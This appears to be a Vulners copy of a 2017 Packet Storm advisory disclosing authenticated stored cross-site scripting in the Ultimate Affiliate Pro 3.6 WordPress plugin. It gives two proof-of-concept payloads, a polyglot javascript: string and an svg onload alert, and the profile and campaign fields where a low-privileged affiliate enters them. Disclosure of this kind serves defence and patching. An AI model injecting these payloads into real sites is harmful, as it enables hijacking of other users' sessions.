Lucene search
K

WordPress Ultimate Affiliate Pro 3.6 Cross Site Scripting

🗓️ 25 Jul 2017 00:00:00Reported by 8bitsecType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

WordPress Ultimate Affiliate Pro 3.6 Authenticated Stored XSS 2017-07-2

Code
`# Exploit Title: Ultimate Affiliate Pro WordPress Plugin <= v3.6 - Authenticated Stored XSS  
# Date: 2017-07-24  
# Exploit Author: 8bitsec  
# Vendor Homepage: http://affiliate.wpindeed.com/  
# Software Link: https://codecanyon.net/item/ultimate-affiliate-pro-wordpress-plugin/16527729  
# Version: 3.6  
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.5]  
# Email: [email protected]  
# Contact: https://twitter.com/_8bitsec  
  
Release Date:  
=============  
2017-07-24  
  
Product & Service Introduction:  
===============================  
Ultimate Affiliate Pro is the newest and most completed Affiliate WordPress Plugin that allow you provide a premium platform for your Affiliates with different rewards and amounts based on Ranks or special Offers.  
  
Technical Details & Description:  
================================  
  
Multiple Stored XSS vulnerabilities found logged as a low privileged user.  
  
Proof of Concept (PoC):  
=======================  
  
Authenticated Stored XSS:  
  
Logged as an affiliate, a low privileged user. Profile > Edit Account.  
Write the payload in the 'Last Name' input area:  
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNMouseoVer=alert(document.domain) )  
  
Other fields may be vulnerable.  
  
Authenticated Stored XSS:  
  
Logged as an affiliate, a low privileged user.  
Marketing > Campaigns > Add New Campaign. Write the payload on the 'Name' input field:  
<svg/onload=alert(document.domain)>  
  
Credits & Authors:  
==================  
8bitsec - [https://twitter.com/_8bitsec]  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation